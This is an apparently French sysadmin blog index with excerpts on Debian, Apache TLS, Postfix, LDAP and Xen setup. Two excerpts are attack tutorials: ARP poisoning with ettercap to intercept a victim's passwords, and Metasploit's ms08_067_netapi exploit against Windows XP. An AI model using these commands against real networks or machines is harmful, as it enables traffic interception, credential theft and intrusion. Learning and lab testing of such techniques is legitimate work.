Configurer le chiffrement TLS d’Apache sous Debian

Avec les récentes failles (POODLE, FREAK..) et les recommandations de l’ANSSI, il est important de n’autoriser, dans la mesure du possible, uniquement que TLSv1.1 et TLSv1.2. Voici un document très intéressant présentant un état des lieux des récommandations : http://www.ssi.gouv.fr/uploads/IMG/pdf/SSL_TLS_etat_des_lieux_et_recommandations.pdf Comment configurer (au mieux?) Apache pour Debian Squeeze LTS, Debian Wheezy et Debian Jessie? L’installation […]

Faire de l’ARP spoofing ou ARP poisoning

Il est très simple, sur le même segment réseau, de se faire passer pour la passerelle… On active l’IP forwarding : $ sudo sysctl -w net.ipv4.ip_forward=1 On lance ettercap : $ sudo ettercap -T -M arp /@IP_PASSERELLE/ /@IP_VICTIME/ Enfin on écoute le réseau avec un outil qui nous affichera les mots de passe transitant en […]

Attaquer un Windows XP avec Metasploit…

Lancement de metasploit : $ sudo msfconsole Utilisation de l’exploit « ms08_067_netapi » : msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > On affiche les options : msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description —- ————— ——– ———– RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE […]

[Debian Wheezy] Spamassassin prend son temps! avec un DNSBL qui ne répond plus…

Après une installation classique d’un serveur SMTP (sur une Wheezy avec les paquets actuels) avec (donc) Postfix 2.9.6-2, Amavis-new 1:2.7.1-2, Clamav 0.97.8+dfsg-1 et Spamassassin 3.3.2 (+pyzor/razo2/DCC), je me rends compte que les messages mettent plus de 4 secondes avant d’être délivrés (de façon asynchrone tout de même).. En mode Debug on peut voir les pourcentages […]

[Debian Wheezy] Surveille ta mailq!

Voici comment superviser simplement la mailq de votre serveur SMTP (Postix par exemple). Installer le serveur snmp : apt-get install snmpd Rajouter dans /etc/snmp/snmpd.conf (w.x.y.z est l’IP du serveur de supervision) les 2 lignes suivantes : rocommunity public w.x.y.z extend mailqstats /etc/snmp/mailqstats.sh Vous pouvez changer le community « public » pour un tout autre nom… Créer le […]

Openldap sur debian squeeze : autoremove des logs bdb

Sachant que les bases sont situées dans /var/lib/ldap, rajoutez dans /var/lib/ldap/DB_CONFIG de : set_flags DB_LOG_AUTOREMOVE D’ailleurs voici un exemple de contenu pour ce fichier : /var/lib/ldap# cat DB_CONFIG set_cachesize 0 2097152 0 set_lk_max_objects 1500 set_lk_max_locks 1500 set_lk_max_lockers 1500 set_flags DB_LOG_AUTOREMOVE Installation d’outils de gestion des bases bdb : # aptitude install db4.8-util Les NOUVEAUX paquets […]

Purger la mailq de Postfix

Pour vider TOUTE la mailq : postsuper -d ALL Pour vider la mailq des messages d’un expéditeur particulier : 1. Récupérer les id_queue des messages de l’expéditeur exemple@adresse.email dans un fichier temporaire (avirer.txt) : mailq | grep exemple@adresse.email | tr -s  »     »  »  » | cut -d »  » -f1 > avirer.txt 2. Lancer ensuite un petit […]

rsync et baie NAS Synology

Sur le NAS (Synology DS210j), le service sauvegarde réseau est activé (Menu principal > Sauvegarder et restaurer > Sauvegarde réseau). Synchronisation de ma partition NTFS vers le NAS : time rsync –del -v -a –timeout=600 /media/partage/ root@192.168.0.9::NetBackup

Hyperviseur Xen sur debian Squeeze amd64

Nous allons installer Xen sur un serveur Dell PowerEdge R410 avec Debian Squeeze amd64! Voici la machine (DELL PowerEdge R410) : Processeur Xeon Quad Core E5620 carte PERC H200 avec 2 disques SAS en RAID1 4 Go de mémoire vive –> On fait l’installation de la debian squeeze avec le CD1 (bien suffisant pour l’installation […]